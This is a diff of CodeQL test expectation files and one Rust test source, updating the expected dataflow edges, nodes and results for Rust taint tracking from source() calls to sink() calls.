@@ -196,6 +191,10 @@ edges | main.rs:467:10:467:11 | vs [element] | main.rs:467:10:467:14 | vs[0] | provenance | | | main.rs:471:9:471:9 | v | main.rs:472:14:472:14 | v | provenance | | | main.rs:471:14:471:15 | vs [element] | main.rs:471:9:471:9 | v | provenance | | +| main.rs:490:9:490:18 | mut vs_mut [element] | main.rs:492:10:492:15 | vs_mut [element] | provenance | | +| main.rs:490:22:490:42 | [...] [element] | main.rs:490:9:490:18 | mut vs_mut [element] | provenance | | +| main.rs:490:23:490:32 | source(...) | main.rs:490:22:490:42 | [...] [element] | provenance | | +| main.rs:492:10:492:15 | vs_mut [element] | main.rs:492:10:492:18 | vs_mut[0] | provenance | | | main.rs:502:9:502:9 | a | main.rs:507:10:507:10 | a | provenance | | | main.rs:502:13:502:22 | source(...) | main.rs:502:9:502:9 | a | provenance | | | main.rs:504:9:504:9 | c | main.rs:505:18:505:18 | c | provenance | | 
@@ -294,19 +293,16 @@ nodes | main.rs:240:9:240:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:240:14:240:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:240:19:240:28 | source(...) | semmle.label | source(...) | -| main.rs:241:10:241:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:241:10:241:20 | s1.unwrap(...) | semmle.label | s1.unwrap(...) | | main.rs:245:9:245:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:245:14:245:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:245:19:245:28 | source(...) | semmle.label | source(...) | -| main.rs:246:10:246:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:246:10:246:24 | s1.unwrap_or(...) | semmle.label | s1.unwrap_or(...) | | main.rs:249:10:249:33 | s2.unwrap_or(...) | semmle.label | s2.unwrap_or(...) | | main.rs:249:23:249:32 | source(...) | semmle.label | source(...) | | main.rs:253:9:253:10 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:253:14:253:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:253:19:253:28 | source(...) | semmle.label | source(...) | -| main.rs:254:10:254:11 | s1 [Some] | semmle.label | s1 [Some] | | main.rs:254:10:254:32 | s1.unwrap_or_else(...) | semmle.label | s1.unwrap_or_else(...) | | main.rs:257:10:257:41 | s2.unwrap_or_else(...) | semmle.label | s2.unwrap_or_else(...) | | main.rs:257:31:257:40 | source(...) | semmle.label | source(...) | 
@@ -327,12 +323,10 @@ nodes | main.rs:283:9:283:10 | s1 [Ok] | semmle.label | s1 [Ok] | | main.rs:283:32:283:45 | Ok(...) [Ok] | semmle.label | Ok(...) [Ok] | | main.rs:283:35:283:44 | source(...) | semmle.label | source(...) | -| main.rs:284:10:284:11 | s1 [Ok] | semmle.label | s1 [Ok] | | main.rs:284:10:284:22 | s1.expect(...) | semmle.label | s1.expect(...) | | main.rs:287:9:287:10 | s2 [Err] | semmle.label | s2 [Err] | | main.rs:287:32:287:46 | Err(...) [Err] | semmle.label | Err(...) [Err] | | main.rs:287:36:287:45 | source(...) | semmle.label | source(...) | -| main.rs:289:10:289:11 | s2 [Err] | semmle.label | s2 [Err] | | main.rs:289:10:289:26 | s2.expect_err(...) | semmle.label | s2.expect_err(...) | | main.rs:298:9:298:10 | s1 [A] | semmle.label | s1 [A] | | main.rs:298:14:298:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | @@ -431,6 +425,11 @@ nodes | main.rs:471:9:471:9 | v | semmle.label | v | | main.rs:471:14:471:15 | vs [element] | semmle.label | vs [element] | | main.rs:472:14:472:14 | v | semmle.label | v | +| main.rs:490:9:490:18 | mut vs_mut [element] | semmle.label | mut vs_mut [element] | +| main.rs:490:22:490:42 | [...] [element] | semmle.label | [...] [element] | +| main.rs:490:23:490:32 | source(...) | semmle.label | source(...) | +| main.rs:492:10:492:15 | vs_mut [element] | semmle.label | vs_mut [element] | +| main.rs:492:10:492:18 | vs_mut[0] | semmle.label | vs_mut[0] | | main.rs:502:9:502:9 | a | semmle.label | a | | main.rs:502:13:502:22 | source(...) | semmle.label | source(...) | | main.rs:504:9:504:9 | c | semmle.label | c | 
@@ -489,5 +488,6 @@ testFailures | main.rs:458:10:458:10 | a | main.rs:453:13:453:22 | source(...) | main.rs:458:10:458:10 | a | $@ | main.rs:453:13:453:22 | source(...) | source(...) | | main.rs:467:10:467:14 | vs[0] | main.rs:465:15:465:24 | source(...) | main.rs:467:10:467:14 | vs[0] | $@ | main.rs:465:15:465:24 | source(...) | source(...) | | main.rs:472:14:472:14 | v | main.rs:465:15:465:24 | source(...) | main.rs:472:14:472:14 | v | $@ | main.rs:465:15:465:24 | source(...) | source(...) | +| main.rs:492:10:492:18 | vs_mut[0] | main.rs:490:23:490:32 | source(...) | main.rs:492:10:492:18 | vs_mut[0] | $@ | main.rs:490:23:490:32 | source(...) | source(...) | | main.rs:507:10:507:10 | a | main.rs:502:13:502:22 | source(...) | main.rs:507:10:507:10 | a | $@ | main.rs:502:13:502:22 | source(...) | source(...) | | main.rs:510:10:510:15 | * ... | main.rs:504:13:504:22 | source(...) | main.rs:510:10:510:15 | * ... | $@ | main.rs:504:13:504:22 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs index 33872fa8e720..38aed12ab21b 100644 --- a/rust/ql/test/library-tests/dataflow/local/main.rs +++ b/rust/ql/test/library-tests/dataflow/local/main.rs @@ -489,7 +489,7 @@ fn iterators() { let mut vs_mut = [source(92), 2, 3, 4]; - sink(vs_mut[0]); // $ MISSING: hasValueFlow=92 + sink(vs_mut[0]); // $ hasValueFlow=92 sink(*vs_mut.iter().next().unwrap()); // $ MISSING: hasValueFlow=92 sink(*vs_mut.iter().nth(0).unwrap()); // $ MISSING: hasValueFlow=92 diff --git a/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected b/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected index a0a64c0a7a52..67ddd325b458 100644 --- a/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/modeled/inline-flow.expected 
@@ -5,41 +5,33 @@ models | 4 | Summary: lang:core; ::clone; Argument[self].Field[crate::result::Result::Ok(0)]; ReturnValue.Field[crate::result::Result::Ok(0)]; value | | 5 | Summary: lang:core; ::unwrap; Argument[self].Field[crate::result::Result::Ok(0)]; ReturnValue; value | edges -| main.rs:13:9:13:9 | a [Some] | main.rs:14:10:14:10 | a [Some] | provenance | | -| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:13 | a [Some] | provenance | | +| main.rs:13:9:13:9 | a [Some] | main.rs:14:10:14:19 | a.unwrap(...) | provenance | MaD:2 | +| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | MaD:1 | +| main.rs:13:9:13:9 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | generated | | main.rs:13:13:13:28 | Some(...) [Some] | main.rs:13:9:13:9 | a [Some] | provenance | | | main.rs:13:18:13:27 | source(...) | main.rs:13:13:13:28 | Some(...) [Some] | provenance | | -| main.rs:14:10:14:10 | a [Some] | main.rs:14:10:14:19 | a.unwrap(...) | provenance | MaD:2 | -| main.rs:15:9:15:9 | b [Some] | main.rs:16:10:16:10 | b [Some] | provenance | | -| main.rs:15:13:15:13 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | MaD:1 | -| main.rs:15:13:15:13 | a [Some] | main.rs:15:13:15:21 | a.clone(...) [Some] | provenance | generated | +| main.rs:15:9:15:9 | b [Some] | main.rs:16:10:16:19 | b.unwrap(...) | provenance | MaD:2 | | main.rs:15:13:15:21 | a.clone(...) [Some] | main.rs:15:9:15:9 | b [Some] | provenance | | -| main.rs:16:10:16:10 | b [Some] | main.rs:16:10:16:19 | b.unwrap(...) | provenance | MaD:2 | -| main.rs:20:9:20:9 | a [Ok] | main.rs:21:10:21:10 | a [Ok] | provenance | | -| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:13 | a [Ok] | provenance | | +| main.rs:20:9:20:9 | a [Ok] | main.rs:21:10:21:19 | a.unwrap(...) | provenance | MaD:5 | +| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | MaD:4 | +| main.rs:20:9:20:9 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) 
[Ok] | provenance | generated | | main.rs:20:31:20:44 | Ok(...) [Ok] | main.rs:20:9:20:9 | a [Ok] | provenance | | | main.rs:20:34:20:43 | source(...) | main.rs:20:31:20:44 | Ok(...) [Ok] | provenance | | -| main.rs:21:10:21:10 | a [Ok] | main.rs:21:10:21:19 | a.unwrap(...) | provenance | MaD:5 | -| main.rs:22:9:22:9 | b [Ok] | main.rs:23:10:23:10 | b [Ok] | provenance | | -| main.rs:22:13:22:13 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | MaD:4 | -| main.rs:22:13:22:13 | a [Ok] | main.rs:22:13:22:21 | a.clone(...) [Ok] | provenance | generated | +| main.rs:22:9:22:9 | b [Ok] | main.rs:23:10:23:19 | b.unwrap(...) | provenance | MaD:5 | | main.rs:22:13:22:21 | a.clone(...) [Ok] | main.rs:22:9:22:9 | b [Ok] | provenance | | -| main.rs:23:10:23:10 | b [Ok] | main.rs:23:10:23:19 | b.unwrap(...) | provenance | MaD:5 | | main.rs:27:9:27:9 | a | main.rs:28:10:28:10 | a | provenance | | -| main.rs:27:9:27:9 | a | main.rs:29:13:29:13 | a | provenance | | +| main.rs:27:9:27:9 | a | main.rs:29:13:29:21 | a.clone(...) | provenance | generated | | main.rs:27:13:27:22 | source(...) | main.rs:27:9:27:9 | a | provenance | | | main.rs:29:9:29:9 | b | main.rs:30:10:30:10 | b | provenance | | -| main.rs:29:13:29:13 | a | main.rs:29:13:29:21 | a.clone(...) | provenance | generated | | main.rs:29:13:29:21 | a.clone(...) | main.rs:29:9:29:9 | b | provenance | | | main.rs:42:13:42:13 | w [Wrapper] | main.rs:43:15:43:15 | w [Wrapper] | provenance | | | main.rs:42:17:42:41 | Wrapper {...} [Wrapper] | main.rs:42:13:42:13 | w [Wrapper] | provenance | | | main.rs:42:30:42:39 | source(...) | main.rs:42:17:42:41 | Wrapper {...} [Wrapper] | provenance | | | main.rs:43:15:43:15 | w [Wrapper] | main.rs:44:13:44:28 | Wrapper {...} [Wrapper] | provenance | | -| main.rs:43:15:43:15 | w [Wrapper] | main.rs:46:17:46:17 | w [Wrapper] | provenance | | +| main.rs:43:15:43:15 | w [Wrapper] | main.rs:46:17:46:25 | w.clone(...) 
[Wrapper] | provenance | generated | | main.rs:44:13:44:28 | Wrapper {...} [Wrapper] | main.rs:44:26:44:26 | n | provenance | | | main.rs:44:26:44:26 | n | main.rs:44:38:44:38 | n | provenance | | | main.rs:46:13:46:13 | u [Wrapper] | main.rs:47:15:47:15 | u [Wrapper] | provenance | | -| main.rs:46:17:46:17 | w [Wrapper] | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | provenance | generated | | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | main.rs:46:13:46:13 | u [Wrapper] | provenance | | | main.rs:47:15:47:15 | u [Wrapper] | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | provenance | | | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | main.rs:48:26:48:26 | n | provenance | | 
@@ -58,28 +50,21 @@ nodes | main.rs:13:9:13:9 | a [Some] | semmle.label | a [Some] | | main.rs:13:13:13:28 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:13:18:13:27 | source(...) | semmle.label | source(...) | -| main.rs:14:10:14:10 | a [Some] | semmle.label | a [Some] | | main.rs:14:10:14:19 | a.unwrap(...) | semmle.label | a.unwrap(...) | | main.rs:15:9:15:9 | b [Some] | semmle.label | b [Some] | -| main.rs:15:13:15:13 | a [Some] | semmle.label | a [Some] | | main.rs:15:13:15:21 | a.clone(...) [Some] | semmle.label | a.clone(...) [Some] | -| main.rs:16:10:16:10 | b [Some] | semmle.label | b [Some] | | main.rs:16:10:16:19 | b.unwrap(...) | semmle.label | b.unwrap(...) | | main.rs:20:9:20:9 | a [Ok] | semmle.label | a [Ok] | | main.rs:20:31:20:44 | Ok(...) [Ok] | semmle.label | Ok(...) [Ok] | | main.rs:20:34:20:43 | source(...) | semmle.label | source(...) | -| main.rs:21:10:21:10 | a [Ok] | semmle.label | a [Ok] | | main.rs:21:10:21:19 | a.unwrap(...) | semmle.label | a.unwrap(...) | | main.rs:22:9:22:9 | b [Ok] | semmle.label | b [Ok] | -| main.rs:22:13:22:13 | a [Ok] | semmle.label | a [Ok] | | main.rs:22:13:22:21 | a.clone(...) [Ok] | semmle.label | a.clone(...) [Ok] | -| main.rs:23:10:23:10 | b [Ok] | semmle.label | b [Ok] | | main.rs:23:10:23:19 | b.unwrap(...) | semmle.label | b.unwrap(...) | | main.rs:27:9:27:9 | a | semmle.label | a | | main.rs:27:13:27:22 | source(...) | semmle.label | source(...) | | main.rs:28:10:28:10 | a | semmle.label | a | | main.rs:29:9:29:9 | b | semmle.label | b | -| main.rs:29:13:29:13 | a | semmle.label | a | | main.rs:29:13:29:21 | a.clone(...) | semmle.label | a.clone(...) | | main.rs:30:10:30:10 | b | semmle.label | b | | main.rs:42:13:42:13 | w [Wrapper] | semmle.label | w [Wrapper] | 
@@ -90,7 +75,6 @@ nodes | main.rs:44:26:44:26 | n | semmle.label | n | | main.rs:44:38:44:38 | n | semmle.label | n | | main.rs:46:13:46:13 | u [Wrapper] | semmle.label | u [Wrapper] | -| main.rs:46:17:46:17 | w [Wrapper] | semmle.label | w [Wrapper] | | main.rs:46:17:46:25 | w.clone(...) [Wrapper] | semmle.label | w.clone(...) [Wrapper] | | main.rs:47:15:47:15 | u [Wrapper] | semmle.label | u [Wrapper] | | main.rs:48:13:48:28 | Wrapper {...} [Wrapper] | semmle.label | Wrapper {...} [Wrapper] | diff --git a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected index 97d5a62618db..3ed7b7502562 100644 --- a/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/pointers/inline-flow.expected @@ -40,6 +40,11 @@ edges | main.rs:73:10:73:10 | [post] b [&ref] | main.rs:74:15:74:15 | b [&ref] | provenance | | | main.rs:73:14:73:23 | source(...) | main.rs:73:10:73:10 | [post] b [&ref] | provenance | | | main.rs:74:15:74:15 | b [&ref] | main.rs:74:14:74:15 | * ... | provenance | | +| main.rs:90:11:90:16 | [post] &mut a [&ref] | main.rs:90:16:90:16 | [post] a | provenance | | +| main.rs:90:16:90:16 | [post] a | main.rs:91:14:91:14 | a | provenance | | +| main.rs:90:21:90:30 | source(...) | main.rs:90:11:90:16 | [post] &mut a [&ref] | provenance | | +| main.rs:95:13:95:29 | mut to_be_cleared | main.rs:98:14:98:26 | to_be_cleared | provenance | | +| main.rs:95:33:95:42 | source(...) | main.rs:95:13:95:29 | mut to_be_cleared | provenance | | | main.rs:105:10:105:10 | [post] c [&ref] | main.rs:106:15:106:15 | c [&ref] | provenance | | | main.rs:105:14:105:23 | source(...) | main.rs:105:10:105:10 | [post] c [&ref] | provenance | | | main.rs:106:15:106:15 | c [&ref] | main.rs:106:14:106:15 | * ... | provenance | | 
@@ -47,6 +52,10 @@ edges | main.rs:112:21:112:21 | a [&ref] | main.rs:113:15:113:15 | a [&ref] | provenance | | | main.rs:112:25:112:34 | source(...) | main.rs:112:13:112:21 | ref mut a | provenance | | | main.rs:113:15:113:15 | a [&ref] | main.rs:113:14:113:15 | * ... | provenance | | +| main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | main.rs:150:11:150:11 | m [MyNumber] | provenance | | +| main.rs:150:11:150:11 | m [MyNumber] | main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | main.rs:151:28:151:33 | number | provenance | | +| main.rs:151:28:151:33 | number | main.rs:149:34:153:1 | { ... } | provenance | | | main.rs:156:18:156:21 | SelfParam [MyNumber] | main.rs:157:15:157:18 | self [MyNumber] | provenance | | | main.rs:157:15:157:18 | self [MyNumber] | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:158:13:158:38 | ...::MyNumber(...) [MyNumber] | main.rs:158:32:158:37 | number | provenance | | 
@@ -56,17 +65,27 @@ edges | main.rs:164:13:164:39 | &... [&ref, MyNumber] | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:164:14:164:39 | ...::MyNumber(...) [MyNumber] | main.rs:164:33:164:38 | number | provenance | | | main.rs:164:33:164:38 | number | main.rs:162:26:166:5 | { ... } | provenance | | -| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:22 | my_number [MyNumber] | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:174:13:174:21 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) | provenance | | | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | main.rs:174:13:174:21 | my_number [MyNumber] | provenance | | | main.rs:174:44:174:53 | source(...) | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | provenance | | -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | -| main.rs:175:14:175:22 | my_number [MyNumber] | main.rs:175:14:175:34 | my_number.to_number(...) | provenance | | | main.rs:179:13:179:21 | my_number [MyNumber] | main.rs:180:16:180:24 | my_number [MyNumber] | provenance | | | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | main.rs:179:13:179:21 | my_number [MyNumber] | provenance | | | main.rs:179:44:179:53 | source(...) | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | provenance | | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | main.rs:180:14:180:31 | ... .get(...) | provenance | | | main.rs:180:16:180:24 | my_number [MyNumber] | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | provenance | | +| main.rs:184:13:184:21 | my_number [MyNumber] | main.rs:186:14:186:22 | my_number [MyNumber] | provenance | | +| main.rs:184:25:184:54 | ...::MyNumber(...) 
[MyNumber] | main.rs:184:13:184:21 | my_number [MyNumber] | provenance | | +| main.rs:184:44:184:53 | source(...) | main.rs:184:25:184:54 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:186:14:186:22 | my_number [MyNumber] | main.rs:186:14:186:28 | my_number.get(...) | provenance | | +| main.rs:190:13:190:21 | my_number [&ref, MyNumber] | main.rs:192:14:192:22 | my_number [&ref, MyNumber] | provenance | | +| main.rs:190:25:190:55 | &... [&ref, MyNumber] | main.rs:190:13:190:21 | my_number [&ref, MyNumber] | provenance | | +| main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | main.rs:190:25:190:55 | &... [&ref, MyNumber] | provenance | | +| main.rs:190:45:190:54 | source(...) | main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:156:18:156:21 | SelfParam [MyNumber] | provenance | | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | main.rs:192:14:192:34 | my_number.to_number(...) | provenance | | | main.rs:200:29:200:38 | ...: i64 | main.rs:201:14:201:18 | value | provenance | | | main.rs:201:10:201:10 | [post] n [&ref] | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | provenance | | | main.rs:201:14:201:18 | value | main.rs:201:10:201:10 | [post] n [&ref] | provenance | | 
@@ -74,6 +93,44 @@ edges | main.rs:210:20:210:29 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | | main.rs:210:20:210:29 | source(...) | main.rs:210:17:210:17 | [post] p [&ref] | provenance | | | main.rs:211:15:211:15 | p [&ref] | main.rs:211:14:211:15 | * ... | provenance | | +| main.rs:218:17:218:22 | [post] &mut n [&ref] | main.rs:218:22:218:22 | [post] n | provenance | | +| main.rs:218:22:218:22 | [post] n | main.rs:219:14:219:14 | n | provenance | | +| main.rs:218:25:218:34 | source(...) | main.rs:200:29:200:38 | ...: i64 | provenance | | +| main.rs:218:25:218:34 | source(...) | main.rs:218:17:218:22 | [post] &mut n [&ref] | provenance | | +| main.rs:223:27:223:37 | ...: i64 | main.rs:224:40:224:45 | number | provenance | | +| main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | main.rs:223:16:223:24 | SelfParam [Return] [&ref, MyNumber] | provenance | | +| main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | main.rs:224:14:224:17 | [post] self [&ref, MyNumber] | provenance | | +| main.rs:224:40:224:45 | number | main.rs:224:21:224:46 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:228:37:228:47 | ...: i64 | main.rs:229:33:229:38 | number | provenance | | +| main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | main.rs:228:19:228:34 | ...: ... [Return] [&ref, MyNumber] | provenance | | +| main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | main.rs:229:10:229:10 | [post] n [&ref, MyNumber] | provenance | | +| main.rs:229:33:229:38 | number | main.rs:229:14:229:39 | ...::MyNumber(...) [MyNumber] | provenance | | +| main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | main.rs:234:25:234:33 | [post] my_number [MyNumber] | provenance | | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | main.rs:235:14:235:22 | my_number [MyNumber] | provenance | | +| main.rs:234:25:234:33 | [post] my_number [MyNumber] | main.rs:237:14:237:22 | my_number [MyNumber] | provenance | | +| main.rs:234:36:234:45 | source(...) 
| main.rs:228:37:228:47 | ...: i64 | provenance | | +| main.rs:234:36:234:45 | source(...) | main.rs:234:20:234:33 | [post] &mut my_number [&ref, MyNumber] | provenance | | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:235:14:235:22 | my_number [MyNumber] | main.rs:235:14:235:28 | my_number.get(...) | provenance | | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:162:12:162:16 | SelfParam [&ref, MyNumber] | provenance | | +| main.rs:237:14:237:22 | my_number [MyNumber] | main.rs:237:14:237:28 | my_number.get(...) | provenance | | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | main.rs:244:24:244:32 | my_number [MyNumber] | provenance | | +| main.rs:243:9:243:17 | [post] my_number [MyNumber] | main.rs:246:24:246:32 | my_number [MyNumber] | provenance | | +| main.rs:243:23:243:32 | source(...) | main.rs:223:27:223:37 | ...: i64 | provenance | | +| main.rs:243:23:243:32 | source(...) | main.rs:243:9:243:17 | [post] my_number [MyNumber] | provenance | | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:244:24:244:32 | my_number [MyNumber] | main.rs:244:14:244:33 | to_number(...) | provenance | | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:246:24:246:32 | my_number [MyNumber] | main.rs:246:14:246:33 | to_number(...) | provenance | | +| main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | main.rs:252:15:252:23 | [post] my_number [MyNumber] | provenance | | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | main.rs:253:24:253:32 | my_number [MyNumber] | provenance | | +| main.rs:252:15:252:23 | [post] my_number [MyNumber] | main.rs:255:24:255:32 | my_number [MyNumber] | provenance | | +| main.rs:252:30:252:39 | source(...) 
| main.rs:223:27:223:37 | ...: i64 | provenance | | +| main.rs:252:30:252:39 | source(...) | main.rs:252:10:252:23 | [post] &mut my_number [&ref, MyNumber] | provenance | | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:253:24:253:32 | my_number [MyNumber] | main.rs:253:14:253:33 | to_number(...) | provenance | | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | provenance | | +| main.rs:255:24:255:32 | my_number [MyNumber] | main.rs:255:14:255:33 | to_number(...) | provenance | | nodes | main.rs:17:13:17:13 | a | semmle.label | a | | main.rs:17:17:17:26 | source(...) | semmle.label | source(...) | @@ -121,6 +178,13 @@ nodes | main.rs:73:14:73:23 | source(...) | semmle.label | source(...) | | main.rs:74:14:74:15 | * ... | semmle.label | * ... | | main.rs:74:15:74:15 | b [&ref] | semmle.label | b [&ref] | +| main.rs:90:11:90:16 | [post] &mut a [&ref] | semmle.label | [post] &mut a [&ref] | +| main.rs:90:16:90:16 | [post] a | semmle.label | [post] a | +| main.rs:90:21:90:30 | source(...) | semmle.label | source(...) | +| main.rs:91:14:91:14 | a | semmle.label | a | +| main.rs:95:13:95:29 | mut to_be_cleared | semmle.label | mut to_be_cleared | +| main.rs:95:33:95:42 | source(...) | semmle.label | source(...) | +| main.rs:98:14:98:26 | to_be_cleared | semmle.label | to_be_cleared | | main.rs:105:10:105:10 | [post] c [&ref] | semmle.label | [post] c [&ref] | | main.rs:105:14:105:23 | source(...) | semmle.label | source(...) | | main.rs:106:14:106:15 | * ... | semmle.label | * ... | 
@@ -130,6 +194,11 @@ nodes | main.rs:112:25:112:34 | source(...) | semmle.label | source(...) | | main.rs:113:14:113:15 | * ... | semmle.label | * ... | | main.rs:113:15:113:15 | a [&ref] | semmle.label | a [&ref] | +| main.rs:149:14:149:24 | ...: MyNumber [MyNumber] | semmle.label | ...: MyNumber [MyNumber] | +| main.rs:149:34:153:1 | { ... } | semmle.label | { ... } | +| main.rs:150:11:150:11 | m [MyNumber] | semmle.label | m [MyNumber] | +| main.rs:151:9:151:34 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:151:28:151:33 | number | semmle.label | number | | main.rs:156:18:156:21 | SelfParam [MyNumber] | semmle.label | SelfParam [MyNumber] | | main.rs:156:31:160:5 | { ... } | semmle.label | { ... } | | main.rs:157:15:157:18 | self [MyNumber] | semmle.label | self [MyNumber] | @@ -144,7 +213,6 @@ nodes | main.rs:174:13:174:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:174:25:174:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | | main.rs:174:44:174:53 | source(...) | semmle.label | source(...) | -| main.rs:175:14:175:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:175:14:175:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | | main.rs:179:13:179:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | | main.rs:179:25:179:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | 
@@ -152,6 +220,17 @@ nodes | main.rs:180:14:180:31 | ... .get(...) | semmle.label | ... .get(...) | | main.rs:180:15:180:24 | &my_number [&ref, MyNumber] | semmle.label | &my_number [&ref, MyNumber] | | main.rs:180:16:180:24 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:184:13:184:21 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:184:25:184:54 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:184:44:184:53 | source(...) | semmle.label | source(...) | +| main.rs:186:14:186:22 | my_number [MyNumber] | semmle.label | my_number [MyNumber] | +| main.rs:186:14:186:28 | my_number.get(...) | semmle.label | my_number.get(...) | +| main.rs:190:13:190:21 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | +| main.rs:190:25:190:55 | &... [&ref, MyNumber] | semmle.label | &... [&ref, MyNumber] | +| main.rs:190:26:190:55 | ...::MyNumber(...) [MyNumber] | semmle.label | ...::MyNumber(...) [MyNumber] | +| main.rs:190:45:190:54 | source(...) | semmle.label | source(...) | +| main.rs:192:14:192:22 | my_number [&ref, MyNumber] | semmle.label | my_number [&ref, MyNumber] | +| main.rs:192:14:192:34 | my_number.to_number(...) | semmle.label | my_number.to_number(...) | | main.rs:200:16:200:26 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | | main.rs:200:29:200:38 | ...: i64 | semmle.label | ...: i64 | | main.rs:201:10:201:10 | [post] n [&ref] | semmle.label | [post] n [&ref] | 
